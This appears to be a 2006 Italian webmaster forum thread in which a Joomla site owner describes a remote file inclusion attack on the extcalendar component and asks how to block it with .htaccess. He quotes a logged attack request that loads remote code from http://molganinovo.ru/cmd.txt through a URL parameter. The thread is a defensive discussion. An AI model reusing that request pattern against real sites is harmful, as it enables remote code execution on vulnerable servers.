Torna indietro   Serverplan Forum > Risorse per Webmaster > PHP

Rispondi
 
LinkBack Strumenti discussione Cerca in questa discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 22-11-2006, 12.13.18
Member
 
Data registrazione: 18-11-2003
Messaggi: 60
guru is on a distinguished road
Predefinito joomla, componente e lamer furbone

Ciao a tutti, su uno dei siti che ho in hosting presso server plan ho joomla e il componente extcalendar, e fin qui tutto ok.

Questo mese la banda del mio sito ? aumentata notevolmente, tant'? che il sito ? stato sospeso.

Finalmente ho scoperto il perch?: un fottutissimo lamer.

Il furbone si sta divertendo a fanciare delle chiamate (con il perl) per sfruttare una vulnerabilit?.

Per fermarlo ho pensato di aggiungere una riga al file .htaccess, ho notato per? che il suo ip di provenienza varia, la cosa costante ? per? questa:
"GET /component/option,com_extcalendar/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://molganinovo.ru/cmd.txt? HTTP/1.1" 200 12671 "-" "libwww-perl/5.79"

Qualcuno sa darmi un mano per fare una regola per farsi che ogni qualvolta si chiami un url che contiene la frase http://molganinovo.ru/cmd.txt appaia solo una scritta (tipo fuck) e nient'altro? :-)

Grazie.

P.S. Lo posto qui, almeno pu? esser utile anche ad altri.
Rispondi citando
  #2 (permalink)  
Vecchio 22-11-2006, 15.36.07
Member
 
Data registrazione: 08-01-2006
Residenza: San Giorgio di Mantova
Messaggi: 81
mbmihele is on a distinguished road
Predefinito

Per una soluzione su htaccess mi hanno segnalato questo sito

prova a vedere se pu? fare al caso tuo

http://www.javascriptkit.com/howto/htaccess10.shtml

Ciao
Rispondi citando
  #3 (permalink)  
Vecchio 23-11-2006, 12.22.46
Member
 
Data registrazione: 18-11-2003
Messaggi: 60
guru is on a distinguished road
Predefinito

Grazie, ma putroppo non sono riuscito a far nulla.

A causa dell'elevato numero di chiamate, sono stato costretto a disainstallare il modulo, cos? l'attacker riceve solo la pagina 404.

Facendo l'analisi dei log ho trovato che in 20 giorni ho ricevuto attacchi da ben 1200 ip diversi!
Quando di bannarli non se ne parla!

Che mi consigliate di fare?
Una denuncia credo che serva a poco, cos? come l'avvertire tutti i proprietari dei server!

Ciao.
Rispondi citando
Rispondi

Strumenti discussione Cerca in questa discussione
Cerca in questa discussione:

Ricerca avanzata
Modalità visualizzazione

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
Joomla e permessi x-ray Pannello di controllo Cpanel - Linux 1 19-02-2007 00.08.03
joomla simone PHP 2 11-12-2006 00.53.00
Joomla...preinstallato Alessandro PHP 1 01-10-2006 22.43.26
joomla, SEF e mod_rewrite guru Pannello di controllo Cpanel - Linux 5 27-06-2006 15.35.01
componente OWC ilperu ASP 1 17-01-2005 10.55.14


Tutti gli orari sono GMT +1. Adesso sono le 21.58.23.


Powered by vBulletin versione 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it